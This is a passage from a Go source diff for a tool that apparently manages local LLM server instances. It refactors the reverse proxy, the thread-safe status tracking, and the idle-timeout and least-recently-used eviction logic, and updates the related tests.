 	log.Printf("Auto-restarting instance %s (attempt %d/%d) in %v",
 		p.instance.Name, p.restarts, maxRestarts, time.Duration(restartDelay)*time.Second)
 	// Create a cancellable context for the restart delay
 	restartCtx, cancel := context.WithCancel(context.Background())
 	p.restartCancel = cancel
 	// Release the lock before sleeping
 	p.mu.Unlock()
 	// Use context-aware sleep so it can be cancelled
 	select {
 	case <-time.After(time.Duration(restartDelay) * time.Second):
 		// Sleep completed normally, continue with restart
 	case <-restartCtx.Done():
 		// Restart was cancelled
 		log.Printf("Restart cancelled for instance %s", p.instance.Name)
 		return
 	}
 	// Restart the instance
 	if err := p.start(); err != nil {
 		log.Printf("Failed to restart instance %s: %v", p.instance.Name, err)
 	} else {
 		log.Printf("Successfully restarted instance %s", p.instance.Name)
 		// Clear the cancel function
 		p.mu.Lock()
 		p.restartCancel = nil
 		p.mu.Unlock()
 	}
 }
 // buildCommand builds the command to execute using backend-specific logic
 func (p *process) buildCommand() (*exec.Cmd, error) {
 	// Build the environment variables
 	env := p.instance.buildEnvironment()
 	// Get the command to execute
 	command := p.instance.getCommand()
 	// Build command arguments
 	args := p.instance.buildCommandArgs()
 	// Create the exec.Cmd
 	cmd := exec.CommandContext(p.ctx, command, args...)
 	// Start with host environment variables
 	cmd.Env = os.Environ()
 	// Add/override with backend-specific environment variables
 	for k, v := range env {
 		cmd.Env = append(cmd.Env, fmt.Sprintf("%s=%s", k, v))
 	}
 	return cmd, nil
 }
--- a/pkg/instance/proxy.go
+++ b/pkg/instance/proxy.go
@@ -0,0 +1,201 @@
 package instance
 import (
 	"fmt"
 	"net/http"
 	"net/http/httputil"
 	"net/url"
 	"sync"
 	"sync/atomic"
 	"time"
 )
 // TimeProvider interface allows for testing with mock time
 type TimeProvider interface {
 	Now() time.Time
 }
 // realTimeProvider implements TimeProvider using the actual time
 type realTimeProvider struct{}
 func (realTimeProvider) Now() time.Time {
 	return time.Now()
 }
 // proxy manages HTTP reverse proxy and request tracking for an instance.
 type proxy struct {
 	instance *Instance
 	targetURL *url.URL
 	apiKey    string // For remote instances
 	responseHeaders map[string]string
 	mu sync.RWMutex
 	proxy     *httputil.ReverseProxy
 	proxyOnce sync.Once
 	proxyErr  error
 	lastRequestTime atomic.Int64
 	timeProvider    TimeProvider
 }
 // newProxy creates a new Proxy for the given instance
 func newProxy(instance *Instance) (*proxy, error) {
 	p := &proxy{
 		instance:     instance,
 		timeProvider: realTimeProvider{},
 	}
 	var err error
 	options := instance.GetOptions()
 	if options == nil {
 		return nil, fmt.Errorf("instance %s has no options set", instance.Name)
 	}
 	if instance.IsRemote() {
 		// Take the first remote node as the target for now
 		var nodeName string
 		for node := range options.Nodes {
 			nodeName = node
 			break
 		}
 		if nodeName == "" {
 			return nil, fmt.Errorf("instance %s has no remote nodes defined", p.instance.Name)
 		}
 		node, ok := p.instance.globalNodesConfig[nodeName]
 		if !ok {
 			return nil, fmt.Errorf("remote node %s is not defined", nodeName)
 		}
 		p.targetURL, err = url.Parse(node.Address)
 		if err != nil {
 			return nil, fmt.Errorf("failed to parse target URL for remote instance %s: %w", p.instance.Name, err)
 		}
 		p.apiKey = node.APIKey
 	} else {
 		// Get host/port from process
 		host := p.instance.options.GetHost()
 		port := p.instance.options.GetPort()
 		if port == 0 {
 			return nil, fmt.Errorf("instance %s has no port assigned", p.instance.Name)
 		}
 		p.targetURL, err = url.Parse(fmt.Sprintf("http://%s:%d", host, port))
 		if err != nil {
 			return nil, fmt.Errorf("failed to parse target URL for instance %s: %w", p.instance.Name, err)
 		}
 		// Get response headers from backend config
 		p.responseHeaders = options.BackendOptions.GetResponseHeaders(p.instance.globalBackendSettings)
 	}
 	return p, nil
 }
 // get returns the reverse proxy for this instance, creating it if needed.
 // Uses sync.Once to ensure thread-safe one-time initialization.
 func (p *proxy) get() (*httputil.ReverseProxy, error) {
 	// sync.Once guarantees buildProxy() is called exactly once
 	// Other callers block until first initialization completes
 	p.proxyOnce.Do(func() {
 		p.proxy, p.proxyErr = p.build()
 	})
 	return p.proxy, p.proxyErr
 }
 // build creates the reverse proxy based on instance options
 func (p *proxy) build() (*httputil.ReverseProxy, error) {
 	proxy := httputil.NewSingleHostReverseProxy(p.targetURL)
 	// Modify the request before sending it to the backend
 	originalDirector := proxy.Director
 	proxy.Director = func(req *http.Request) {
 		originalDirector(req)
 		// Add API key header for remote instances
 		if p.instance.IsRemote() && p.apiKey != "" {
 			req.Header.Set("Authorization", "Bearer "+p.apiKey)
 		}
 		// Update last request time
 		p.updateLastRequestTime()
 	}
 	if !p.instance.IsRemote() {
 		// Add custom headers to the request
 		proxy.ModifyResponse = func(resp *http.Response) error {
 			// Remove CORS headers from backend response to avoid conflicts
 			// llamactl will add its own CORS headers
 			resp.Header.Del("Access-Control-Allow-Origin")
 			resp.Header.Del("Access-Control-Allow-Methods")
 			resp.Header.Del("Access-Control-Allow-Headers")
 			resp.Header.Del("Access-Control-Allow-Credentials")
 			resp.Header.Del("Access-Control-Max-Age")
 			resp.Header.Del("Access-Control-Expose-Headers")
 			for key, value := range p.responseHeaders {
 				resp.Header.Set(key, value)
 			}
 			return nil
 		}
 	}
 	return proxy, nil
 }
 // clear resets the proxy, allowing it to be recreated when options change.
 func (p *proxy) clear() {
 	p.mu.Lock()
 	defer p.mu.Unlock()
 	p.proxy = nil
 	p.proxyErr = nil
 	p.proxyOnce = sync.Once{} // Reset Once for next GetProxy call
 }
 // updateLastRequestTime updates the last request access time for the instance
 func (p *proxy) updateLastRequestTime() {
 	lastRequestTime := p.timeProvider.Now().Unix()
 	p.lastRequestTime.Store(lastRequestTime)
 }
 // getLastRequestTime returns the last request time as a Unix timestamp
 func (p *proxy) getLastRequestTime() int64 {
 	return p.lastRequestTime.Load()
 }
 // shouldTimeout checks if the instance should timeout based on idle time
 func (p *proxy) shouldTimeout() bool {
 	if !p.instance.IsRunning() {
 		return false
 	}
 	options := p.instance.GetOptions()
 	if options == nil || options.IdleTimeout == nil || *options.IdleTimeout <= 0 {
 		return false
 	}
 	// Check if the last request time exceeds the idle timeout
 	lastRequest := p.lastRequestTime.Load()
 	idleTimeoutMinutes := *options.IdleTimeout
 	// Convert timeout from minutes to seconds for comparison
 	idleTimeoutSeconds := int64(idleTimeoutMinutes * 60)
 	return (p.timeProvider.Now().Unix() - lastRequest) > idleTimeoutSeconds
 }
 // setTimeProvider sets a custom time provider for testing
 func (p *proxy) setTimeProvider(tp TimeProvider) {
 	p.timeProvider = tp
 }
--- a/pkg/instance/status.go
+++ b/pkg/instance/status.go
@@ -3,48 +3,35 @@ package instance
 import (
 	"encoding/json"
 	"log"
 	"sync"
 )
-// Enum for instance status
+// Status is the enum for status values (exported).
-type InstanceStatus int
+type Status int
 const (
-	Stopped InstanceStatus = iota
+	Stopped Status = iota
 	Running
 	Failed
 	Restarting
 )
-var nameToStatus = map[string]InstanceStatus{
+var nameToStatus = map[string]Status{
-	"stopped": Stopped,
+	"stopped":    Stopped,
-	"running": Running,
+	"running":    Running,
-	"failed":  Failed,
+	"failed":     Failed,
 	"restarting": Restarting,
 }
-var statusToName = map[InstanceStatus]string{
+var statusToName = map[Status]string{
-	Stopped: "stopped",
+	Stopped:    "stopped",
-	Running: "running",
+	Running:    "running",
-	Failed:  "failed",
+	Failed:     "failed",
 	Restarting: "restarting",
 }
-func (p *Process) SetStatus(status InstanceStatus) {
+// Status enum JSON marshaling methods
-	oldStatus := p.Status
+func (s Status) MarshalJSON() ([]byte, error) {
 	p.Status = status
 	if p.onStatusChange != nil {
 		p.onStatusChange(oldStatus, status)
 	}
 }
 func (p *Process) GetStatus() InstanceStatus {
 	return p.Status
 }
 // IsRunning returns true if the status is Running
 func (p *Process) IsRunning() bool {
 	return p.Status == Running
 }
 func (s InstanceStatus) MarshalJSON() ([]byte, error) {
 	name, ok := statusToName[s]
 	if !ok {
 		name = "stopped" // Default to "stopped" for unknown status
@@ -52,8 +39,8 @@ func (s InstanceStatus) MarshalJSON() ([]byte, error) {
 	return json.Marshal(name)
 }
-// UnmarshalJSON implements json.Unmarshaler
+// UnmarshalJSON implements json.Unmarshaler for Status enum
-func (s *InstanceStatus) UnmarshalJSON(data []byte) error {
+func (s *Status) UnmarshalJSON(data []byte) error {
 	var str string
 	if err := json.Unmarshal(data, &str); err != nil {
 		return err
@@ -68,3 +55,61 @@ func (s *InstanceStatus) UnmarshalJSON(data []byte) error {
 	*s = status
 	return nil
 }
 // status represents the instance status with thread-safe access (unexported).
 type status struct {
 	mu sync.RWMutex
 	s  Status
 	// Callback for status changes
 	onStatusChange func(oldStatus, newStatus Status)
 }
 // newStatus creates a new status wrapper with the given initial status
 func newStatus(initial Status) *status {
 	return &status{
 		s: initial,
 	}
 }
 // get returns the current status
 func (st *status) get() Status {
 	st.mu.RLock()
 	defer st.mu.RUnlock()
 	return st.s
 }
 // set updates the status and triggers the onStatusChange callback if set
 func (st *status) set(newStatus Status) {
 	st.mu.Lock()
 	oldStatus := st.s
 	st.s = newStatus
 	callback := st.onStatusChange
 	st.mu.Unlock()
 	// Call the callback outside the lock to avoid potential deadlocks
 	if callback != nil {
 		callback(oldStatus, newStatus)
 	}
 }
 // isRunning returns true if the status is Running
 func (st *status) isRunning() bool {
 	st.mu.RLock()
 	defer st.mu.RUnlock()
 	return st.s == Running
 }
 // MarshalJSON implements json.Marshaler for status wrapper
 func (st *status) MarshalJSON() ([]byte, error) {
 	st.mu.RLock()
 	defer st.mu.RUnlock()
 	return st.s.MarshalJSON()
 }
 // UnmarshalJSON implements json.Unmarshaler for status wrapper
 func (st *status) UnmarshalJSON(data []byte) error {
 	st.mu.Lock()
 	defer st.mu.Unlock()
 	return st.s.UnmarshalJSON(data)
 }
--- a/pkg/instance/timeout.go
+++ b/pkg/instance/timeout.go
@@ -1,28 +0,0 @@
 package instance
 // UpdateLastRequestTime updates the last request access time for the instance via proxy
 func (i *Process) UpdateLastRequestTime() {
 	i.mu.Lock()
 	defer i.mu.Unlock()
 	lastRequestTime := i.timeProvider.Now().Unix()
 	i.lastRequestTime.Store(lastRequestTime)
 }
 func (i *Process) ShouldTimeout() bool {
 	i.mu.RLock()
 	defer i.mu.RUnlock()
 	if !i.IsRunning() || i.options.IdleTimeout == nil || *i.options.IdleTimeout <= 0 {
 		return false
 	}
 	// Check if the last request time exceeds the idle timeout
 	lastRequest := i.lastRequestTime.Load()
 	idleTimeoutMinutes := *i.options.IdleTimeout
 	// Convert timeout from minutes to seconds for comparison
 	idleTimeoutSeconds := int64(idleTimeoutMinutes * 60)
 	return (i.timeProvider.Now().Unix() - lastRequest) > idleTimeoutSeconds
 }
--- a/pkg/instance/timeout_test.go
+++ b/pkg/instance/timeout_test.go
@@ -1,250 +0,0 @@
 package instance_test
 import (
 	"llamactl/pkg/backends"
 	"llamactl/pkg/backends/llamacpp"
 	"llamactl/pkg/config"
 	"llamactl/pkg/instance"
 	"llamactl/pkg/testutil"
 	"sync/atomic"
 	"testing"
 	"time"
 )
 // MockTimeProvider implements TimeProvider for testing
 type MockTimeProvider struct {
 	currentTime atomic.Int64 // Unix timestamp
 }
 func NewMockTimeProvider(t time.Time) *MockTimeProvider {
 	m := &MockTimeProvider{}
 	m.currentTime.Store(t.Unix())
 	return m
 }
 func (m *MockTimeProvider) Now() time.Time {
 	return time.Unix(m.currentTime.Load(), 0)
 }
 func (m *MockTimeProvider) SetTime(t time.Time) {
 	m.currentTime.Store(t.Unix())
 }
 // Timeout-related tests
 func TestUpdateLastRequestTime(t *testing.T) {
 	backendConfig := &config.BackendConfig{
 		LlamaExecutable: "llama-server",
 		MLXLMExecutable: "mlx_lm.server",
 	}
 	globalSettings := &config.InstancesConfig{
 		LogsDir: "/tmp/test",
 	}
 	options := &instance.CreateInstanceOptions{
 		BackendType: backends.BackendTypeLlamaCpp,
 		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 		},
 	}
 	// Mock onStatusChange function
 	mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
 	inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
 	// Test that UpdateLastRequestTime doesn't panic
 	inst.UpdateLastRequestTime()
 }
 func TestShouldTimeout_NotRunning(t *testing.T) {
 	backendConfig := &config.BackendConfig{
 		LlamaExecutable: "llama-server",
 		MLXLMExecutable: "mlx_lm.server",
 	}
 	globalSettings := &config.InstancesConfig{
 		LogsDir: "/tmp/test",
 	}
 	idleTimeout := 1 // 1 minute
 	options := &instance.CreateInstanceOptions{
 		IdleTimeout: &idleTimeout,
 		BackendType: backends.BackendTypeLlamaCpp,
 		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 		},
 	}
 	// Mock onStatusChange function
 	mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
 	inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
 	// Instance is not running, should not timeout regardless of configuration
 	if inst.ShouldTimeout() {
 		t.Error("Non-running instance should never timeout")
 	}
 }
 func TestShouldTimeout_NoTimeoutConfigured(t *testing.T) {
 	backendConfig := &config.BackendConfig{
 		LlamaExecutable: "llama-server",
 		MLXLMExecutable: "mlx_lm.server",
 	}
 	globalSettings := &config.InstancesConfig{
 		LogsDir: "/tmp/test",
 	}
 	tests := []struct {
 		name        string
 		idleTimeout *int
 	}{
 		{"nil timeout", nil},
 		{"zero timeout", testutil.IntPtr(0)},
 		{"negative timeout", testutil.IntPtr(-5)},
 	}
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			// Mock onStatusChange function
 			mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
 			options := &instance.CreateInstanceOptions{
 				IdleTimeout: tt.idleTimeout,
 				BackendType: backends.BackendTypeLlamaCpp,
 				LlamaServerOptions: &llamacpp.LlamaServerOptions{
 					Model: "/path/to/model.gguf",
 				},
 			}
 			inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
 			// Simulate running state
 			inst.SetStatus(instance.Running)
 			if inst.ShouldTimeout() {
 				t.Errorf("Instance with %s should not timeout", tt.name)
 			}
 		})
 	}
 }
 func TestShouldTimeout_WithinTimeLimit(t *testing.T) {
 	backendConfig := &config.BackendConfig{
 		LlamaExecutable: "llama-server",
 		MLXLMExecutable: "mlx_lm.server",
 	}
 	globalSettings := &config.InstancesConfig{
 		LogsDir: "/tmp/test",
 	}
 	idleTimeout := 5 // 5 minutes
 	options := &instance.CreateInstanceOptions{
 		IdleTimeout: &idleTimeout,
 		BackendType: backends.BackendTypeLlamaCpp,
 		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 		},
 	}
 	// Mock onStatusChange function
 	mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
 	inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
 	inst.SetStatus(instance.Running)
 	// Update last request time to now
 	inst.UpdateLastRequestTime()
 	// Should not timeout immediately
 	if inst.ShouldTimeout() {
 		t.Error("Instance should not timeout when last request was recent")
 	}
 }
 func TestShouldTimeout_ExceedsTimeLimit(t *testing.T) {
 	backendConfig := &config.BackendConfig{
 		LlamaExecutable: "llama-server",
 		MLXLMExecutable: "mlx_lm.server",
 	}
 	globalSettings := &config.InstancesConfig{
 		LogsDir: "/tmp/test",
 	}
 	idleTimeout := 1 // 1 minute
 	options := &instance.CreateInstanceOptions{
 		IdleTimeout: &idleTimeout,
 		BackendType: backends.BackendTypeLlamaCpp,
 		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 		},
 	}
 	// Mock onStatusChange function
 	mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
 	inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
 	inst.SetStatus(instance.Running)
 	// Use MockTimeProvider to simulate old last request time
 	mockTime := NewMockTimeProvider(time.Now())
 	inst.SetTimeProvider(mockTime)
 	// Set last request time to now
 	inst.UpdateLastRequestTime()
 	// Advance time by 2 minutes (exceeds 1 minute timeout)
 	mockTime.SetTime(time.Now().Add(2 * time.Minute))
 	if !inst.ShouldTimeout() {
 		t.Error("Instance should timeout when last request exceeds idle timeout")
 	}
 }
 func TestTimeoutConfiguration_Validation(t *testing.T) {
 	backendConfig := &config.BackendConfig{
 		LlamaExecutable: "llama-server",
 		MLXLMExecutable: "mlx_lm.server",
 	}
 	globalSettings := &config.InstancesConfig{
 		LogsDir: "/tmp/test",
 	}
 	tests := []struct {
 		name            string
 		inputTimeout    *int
 		expectedTimeout int
 	}{
 		{"default value when nil", nil, 0},
 		{"positive value", testutil.IntPtr(10), 10},
 		{"zero value", testutil.IntPtr(0), 0},
 		{"negative value gets corrected", testutil.IntPtr(-5), 0},
 	}
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			options := &instance.CreateInstanceOptions{
 				IdleTimeout: tt.inputTimeout,
 				BackendType: backends.BackendTypeLlamaCpp,
 				LlamaServerOptions: &llamacpp.LlamaServerOptions{
 					Model: "/path/to/model.gguf",
 				},
 			}
 			// Mock onStatusChange function
 			mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
 			inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
 			opts := inst.GetOptions()
 			if opts.IdleTimeout == nil || *opts.IdleTimeout != tt.expectedTimeout {
 				t.Errorf("Expected IdleTimeout %d, got %v", tt.expectedTimeout, opts.IdleTimeout)
 			}
 		})
 	}
 }
--- a/pkg/manager/lifecycle.go
+++ b/pkg/manager/lifecycle.go
@@ -0,0 +1,152 @@
 package manager
 import (
 	"fmt"
 	"llamactl/pkg/instance"
 	"log"
 	"sync"
 	"time"
 )
 // lifecycleManager handles background timeout checking and LRU eviction.
 // It properly coordinates shutdown to prevent races with the timeout checker.
 type lifecycleManager struct {
 	registry *instanceRegistry
 	manager  InstanceManager // For calling Stop/Evict operations
 	ticker        *time.Ticker
 	checkInterval time.Duration
 	enableLRU     bool
 	shutdownChan chan struct{}
 	shutdownDone chan struct{}
 	shutdownOnce sync.Once
 }
 // newLifecycleManager creates a new lifecycle manager.
 func newLifecycleManager(
 	registry *instanceRegistry,
 	manager InstanceManager,
 	checkInterval time.Duration,
 	enableLRU bool,
 ) *lifecycleManager {
 	if checkInterval <= 0 {
 		checkInterval = 5 * time.Minute // Default to 5 minutes
 	}
 	return &lifecycleManager{
 		registry:      registry,
 		manager:       manager,
 		ticker:        time.NewTicker(checkInterval),
 		checkInterval: checkInterval,
 		enableLRU:     enableLRU,
 		shutdownChan:  make(chan struct{}),
 		shutdownDone:  make(chan struct{}),
 	}
 }
 // Start begins the timeout checking loop in a goroutine.
 func (l *lifecycleManager) start() {
 	go l.timeoutCheckLoop()
 }
 // Stop gracefully stops the lifecycle manager.
 // This ensures the timeout checker completes before instance cleanup begins.
 func (l *lifecycleManager) stop() {
 	l.shutdownOnce.Do(func() {
 		close(l.shutdownChan)
 		<-l.shutdownDone // Wait for checker to finish (prevents shutdown race)
 		l.ticker.Stop()
 	})
 }
 // timeoutCheckLoop is the main loop that periodically checks for timeouts.
 func (l *lifecycleManager) timeoutCheckLoop() {
 	defer close(l.shutdownDone) // Signal completion
 	for {
 		select {
 		case <-l.ticker.C:
 			l.checkTimeouts()
 		case <-l.shutdownChan:
 			return // Exit goroutine on shutdown
 		}
 	}
 }
 // checkTimeouts checks all instances for timeout and stops those that have timed out.
 func (l *lifecycleManager) checkTimeouts() {
 	// Get all instances from registry
 	instances := l.registry.list()
 	var timeoutInstances []string
 	// Identify instances that should timeout
 	for _, inst := range instances {
 		// Skip remote instances - they are managed by their respective nodes
 		if inst.IsRemote() {
 			continue
 		}
 		// Only check running instances
 		if !l.registry.isRunning(inst.Name) {
 			continue
 		}
 		if inst.ShouldTimeout() {
 			timeoutInstances = append(timeoutInstances, inst.Name)
 		}
 	}
 	// Stop the timed-out instances
 	for _, name := range timeoutInstances {
 		log.Printf("Instance %s has timed out, stopping it", name)
 		if _, err := l.manager.StopInstance(name); err != nil {
 			log.Printf("Error stopping instance %s: %v", name, err)
 		} else {
 			log.Printf("Instance %s stopped successfully", name)
 		}
 	}
 }
 // EvictLRU finds and stops the least recently used running instance.
 // This is called when max running instances limit is reached.
 func (l *lifecycleManager) evictLRU() error {
 	if !l.enableLRU {
 		return fmt.Errorf("LRU eviction is not enabled")
 	}
 	// Get all running instances
 	runningInstances := l.registry.listRunning()
 	var lruInstance *instance.Instance
 	for _, inst := range runningInstances {
 		// Skip remote instances - they are managed by their respective nodes
 		if inst.IsRemote() {
 			continue
 		}
 		// Skip instances without idle timeout
 		if inst.GetOptions() != nil && inst.GetOptions().IdleTimeout != nil && *inst.GetOptions().IdleTimeout <= 0 {
 			continue
 		}
 		if lruInstance == nil {
 			lruInstance = inst
 		}
 		if inst.LastRequestTime() < lruInstance.LastRequestTime() {
 			lruInstance = inst
 		}
 	}
 	if lruInstance == nil {
 		return fmt.Errorf("failed to find lru instance")
 	}
 	// Evict the LRU instance
 	log.Printf("Evicting LRU instance %s", lruInstance.Name)
 	_, err := l.manager.StopInstance(lruInstance.Name)
 	return err
 }
--- a/pkg/manager/lifecycle_test.go
+++ b/pkg/manager/lifecycle_test.go
@@ -0,0 +1,220 @@
 package manager_test
 import (
 	"llamactl/pkg/backends"
 	"llamactl/pkg/instance"
 	"llamactl/pkg/manager"
 	"sync"
 	"testing"
 	"time"
 )
 func TestInstanceTimeoutLogic(t *testing.T) {
 	testManager := createTestManager()
 	defer testManager.Shutdown()
 	idleTimeout := 1 // 1 minute
 	inst := createInstanceWithTimeout(t, testManager, "timeout-test", "/path/to/model.gguf", &idleTimeout)
 	// Test timeout logic with mock time provider
 	mockTime := NewMockTimeProvider(time.Now())
 	inst.SetTimeProvider(mockTime)
 	// Set instance to running state so timeout logic can work
 	inst.SetStatus(instance.Running)
 	defer inst.SetStatus(instance.Stopped)
 	// Update last request time
 	inst.UpdateLastRequestTime()
 	// Initially should not timeout (just updated)
 	if inst.ShouldTimeout() {
 		t.Error("Instance should not timeout immediately after request")
 	}
 	// Advance time to trigger timeout
 	mockTime.SetTime(time.Now().Add(2 * time.Minute))
 	// Now it should timeout
 	if !inst.ShouldTimeout() {
 		t.Error("Instance should timeout after idle period")
 	}
 }
 func TestInstanceWithoutTimeoutNeverExpires(t *testing.T) {
 	testManager := createTestManager()
 	defer testManager.Shutdown()
 	noTimeoutInst := createInstanceWithTimeout(t, testManager, "no-timeout-test", "/path/to/model.gguf", nil)
 	mockTime := NewMockTimeProvider(time.Now())
 	noTimeoutInst.SetTimeProvider(mockTime)
 	noTimeoutInst.SetStatus(instance.Running)
 	defer noTimeoutInst.SetStatus(instance.Stopped)
 	noTimeoutInst.UpdateLastRequestTime()
 	// Advance time significantly
 	mockTime.SetTime(mockTime.Now().Add(24 * time.Hour))
 	// Even with time advanced, should not timeout
 	if noTimeoutInst.ShouldTimeout() {
 		t.Error("Instance without timeout configuration should never timeout")
 	}
 }
 func TestEvictLRUInstance_Success(t *testing.T) {
 	manager := createTestManager()
 	defer manager.Shutdown()
 	// Create 3 instances with idle timeout enabled (value doesn't matter for LRU logic)
 	validTimeout := 1
 	inst1 := createInstanceWithTimeout(t, manager, "instance-1", "/path/to/model1.gguf", &validTimeout)
 	inst2 := createInstanceWithTimeout(t, manager, "instance-2", "/path/to/model2.gguf", &validTimeout)
 	inst3 := createInstanceWithTimeout(t, manager, "instance-3", "/path/to/model3.gguf", &validTimeout)
 	// Set up mock time and set instances to running
 	mockTime := NewMockTimeProvider(time.Now())
 	inst1.SetTimeProvider(mockTime)
 	inst2.SetTimeProvider(mockTime)
 	inst3.SetTimeProvider(mockTime)
 	inst1.SetStatus(instance.Running)
 	inst2.SetStatus(instance.Running)
 	inst3.SetStatus(instance.Running)
 	defer func() {
 		// Clean up - ensure all instances are stopped
 		for _, inst := range []*instance.Instance{inst1, inst2, inst3} {
 			if inst.IsRunning() {
 				inst.SetStatus(instance.Stopped)
 			}
 		}
 	}()
 	// Set different last request times (oldest to newest)
 	// inst1: oldest (will be evicted)
 	inst1.UpdateLastRequestTime()
 	mockTime.SetTime(mockTime.Now().Add(1 * time.Minute))
 	inst2.UpdateLastRequestTime()
 	mockTime.SetTime(mockTime.Now().Add(1 * time.Minute))
 	inst3.UpdateLastRequestTime()
 	// Evict LRU instance (should be inst1)
 	if err := manager.EvictLRUInstance(); err != nil {
 		t.Fatalf("EvictLRUInstance failed: %v", err)
 	}
 	// Verify inst1 is stopped
 	if inst1.IsRunning() {
 		t.Error("Expected instance-1 to be stopped after eviction")
 	}
 	// Verify inst2 and inst3 are still running
 	if !inst2.IsRunning() {
 		t.Error("Expected instance-2 to still be running")
 	}
 	if !inst3.IsRunning() {
 		t.Error("Expected instance-3 to still be running")
 	}
 }
 func TestEvictLRUInstance_NoRunningInstances(t *testing.T) {
 	manager := createTestManager()
 	defer manager.Shutdown()
 	err := manager.EvictLRUInstance()
 	if err == nil {
 		t.Error("Expected error when no running instances exist")
 	}
 	if err.Error() != "failed to find lru instance" {
 		t.Errorf("Expected 'failed to find lru instance' error, got: %v", err)
 	}
 }
 func TestEvictLRUInstance_OnlyEvictsTimeoutEnabledInstances(t *testing.T) {
 	manager := createTestManager()
 	defer manager.Shutdown()
 	// Create mix of instances: some with timeout enabled, some disabled
 	// Only timeout-enabled instances should be eligible for eviction
 	validTimeout := 1
 	zeroTimeout := 0
 	instWithTimeout := createInstanceWithTimeout(t, manager, "with-timeout", "/path/to/model-with-timeout.gguf", &validTimeout)
 	instNoTimeout1 := createInstanceWithTimeout(t, manager, "no-timeout-1", "/path/to/model-no-timeout1.gguf", &zeroTimeout)
 	instNoTimeout2 := createInstanceWithTimeout(t, manager, "no-timeout-2", "/path/to/model-no-timeout2.gguf", nil)
 	// Set all instances to running
 	instances := []*instance.Instance{instWithTimeout, instNoTimeout1, instNoTimeout2}
 	for _, inst := range instances {
 		inst.SetStatus(instance.Running)
 		inst.UpdateLastRequestTime()
 	}
 	defer func() {
 		// Reset instances to stopped to avoid shutdown panics
 		for _, inst := range instances {
 			if inst.IsRunning() {
 				inst.SetStatus(instance.Stopped)
 			}
 		}
 	}()
 	// Evict LRU instance - should only consider the one with timeout
 	err := manager.EvictLRUInstance()
 	if err != nil {
 		t.Fatalf("EvictLRUInstance failed: %v", err)
 	}
 	// Verify only the instance with timeout was evicted
 	if instWithTimeout.IsRunning() {
 		t.Error("Expected with-timeout instance to be stopped after eviction")
 	}
 	if !instNoTimeout1.IsRunning() {
 		t.Error("Expected no-timeout-1 instance to still be running")
 	}
 	if !instNoTimeout2.IsRunning() {
 		t.Error("Expected no-timeout-2 instance to still be running")
 	}
 }
 // Helper function to create instances with different timeout configurations
 func createInstanceWithTimeout(t *testing.T, manager manager.InstanceManager, name, model string, timeout *int) *instance.Instance {
 	t.Helper()
 	options := &instance.Options{
 		IdleTimeout: timeout,
 		BackendOptions: backends.Options{
 			BackendType: backends.BackendTypeLlamaCpp,
 			LlamaServerOptions: &backends.LlamaServerOptions{
 				Model: model,
 			},
 		},
 	}
 	inst, err := manager.CreateInstance(name, options)
 	if err != nil {
 		t.Fatalf("CreateInstance failed: %v", err)
 	}
 	return inst
 }
 // Helper for timeout tests
 type MockTimeProvider struct {
 	currentTime time.Time
 	mu          sync.RWMutex
 }
 func NewMockTimeProvider(t time.Time) *MockTimeProvider {
 	return &MockTimeProvider{currentTime: t}
 }
 func (m *MockTimeProvider) Now() time.Time {
 	m.mu.RLock()
 	defer m.mu.RUnlock()
 	return m.currentTime
 }
 func (m *MockTimeProvider) SetTime(t time.Time) {
 	m.mu.Lock()
 	defer m.mu.Unlock()
 	m.currentTime = t
 }
--- a/pkg/manager/manager.go
+++ b/pkg/manager/manager.go
@@ -1,298 +1,303 @@
 package manager
 import (
-	"encoding/json"
+	"context"
 	"fmt"
 	"llamactl/pkg/config"
 	"llamactl/pkg/instance"
 	"log"
 	"os"
 	"path/filepath"
 	"strings"
 	"sync"
 	"time"
 )
 // InstanceManager defines the interface for managing instances of the llama server.
 type InstanceManager interface {
-	ListInstances() ([]*instance.Process, error)
+	ListInstances() ([]*instance.Instance, error)
-	CreateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
+	CreateInstance(name string, options *instance.Options) (*instance.Instance, error)
-	GetInstance(name string) (*instance.Process, error)
+	GetInstance(name string) (*instance.Instance, error)
-	UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
+	UpdateInstance(name string, options *instance.Options) (*instance.Instance, error)
 	DeleteInstance(name string) error
-	StartInstance(name string) (*instance.Process, error)
+	StartInstance(name string) (*instance.Instance, error)
 	IsMaxRunningInstancesReached() bool
-	StopInstance(name string) (*instance.Process, error)
+	StopInstance(name string) (*instance.Instance, error)
 	EvictLRUInstance() error
-	RestartInstance(name string) (*instance.Process, error)
+	RestartInstance(name string) (*instance.Instance, error)
-	GetInstanceLogs(name string) (string, error)
+	GetInstanceLogs(name string, numLines int) (string, error)
 	Shutdown()
 }
 type instanceManager struct {
-	mu               sync.RWMutex
+	// Components (each with own synchronization)
-	instances        map[string]*instance.Process
+	registry    *instanceRegistry
-	runningInstances map[string]struct{}
+	ports       *portAllocator
-	ports            map[int]bool
+	persistence *instancePersister
-	instancesConfig  config.InstancesConfig
+	remote      *remoteManager
-	backendsConfig   config.BackendConfig
+	lifecycle   *lifecycleManager
-	// Timeout checker
+	// Configuration
-	timeoutChecker *time.Ticker
+	globalConfig *config.AppConfig
-	shutdownChan   chan struct{}
+
-	shutdownDone   chan struct{}
+	// Synchronization
-	isShutdown     bool
